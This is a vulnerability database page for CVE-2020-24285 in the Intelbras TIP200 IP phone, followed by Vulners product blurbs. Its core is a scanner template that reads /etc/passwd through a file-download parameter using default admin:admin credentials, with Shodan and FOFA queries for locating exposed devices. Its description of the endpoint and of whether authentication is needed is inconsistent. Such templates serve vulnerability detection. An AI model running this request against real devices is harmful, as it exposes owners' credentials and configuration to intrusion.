| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2020-24285 | 28 May 202510:48 | – | circl | |
| Intelbras TIP 200 信息泄露漏洞 | 12 Apr 202100:00 | – | cnnvd | |
| CVE-2020-24285 | 12 Apr 202110:49 | – | cve | |
| CVE-2020-24285 | 12 Apr 202110:49 | – | cvelist | |
| CVE-2020-24285 | 12 Apr 202111:15 | – | nvd | |
| CVE-2020-24285 | 12 Apr 202111:15 | – | osv | |
| Information disclosure | 12 Apr 202111:15 | – | prion | |
| PT-2021-11025 · Intelbras · Intelbras Telefone Ip Tip200 | 12 Apr 202100:00 | – | ptsecurity | |
| CVE-2020-24285 | 9 Jan 202609:50 | – | redhatcve |
id: CVE-2020-24285
info:
name: INTELBRAS TELEFONE IP TIP200 60.61.75.22 - Local File Inclusion
author: ritikchaddha
severity: high
description: |
INTELBRAS TELEFONE IP TIP200 version 60.61.75.22 is vulnerable to information disclosure, allowing unauthenticated attackers to access sensitive device information and configuration data via a direct request to the /cgi-bin/export_settings.sh endpoint.
impact: |
Authenticated attackers can read arbitrary files from the device including configuration files and credentials, potentially leading to complete device compromise.
remediation: |
Update the device firmware to the latest version provided by INTELBRAS.
reference:
- https://github.com/SecLoop/CVE/blob/main/telefone_ip_tip200.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-24285
classification:
cve-id: CVE-2020-24285
cwe-id: CWE-200
epss-score: 0.03943
epss-percentile: 0.89145
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
metadata:
vendor: intelbras
product: tip200
max-request: 1
verified: true
shodan-query: html:"/cgi-bin/cgiServer.exx"
fofa-query: body="/cgi-bin/cgiServer.exx"
tags: cve,cve2020,intelbras,telefone,tip200,exposure,lfi,vuln
variables:
username: "admin"
password: "admin"
http:
- raw:
- |
GET /cgi-bin/cgiServer.exx?download=/etc/passwd HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64('{{username}}:' + '{{password}}')}}
skip-variables-check: true
matchers:
- type: dsl
dsl:
- "contains_all(tolower(header), 'application/octet-stream', 'filename=')"
- "regex('root:.*:0:0:', body)"
- "status_code == 200"
condition: and
# digest: 4b0a00483046022100a3dc3c733e181a3f69ebd5f2f20dcc1a6db024d77cdf994ed34ff7552047d270022100a806e3e3bd8454a1f9beadfca45fd2a8ae681c5331617595de929b19a7b050f6:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation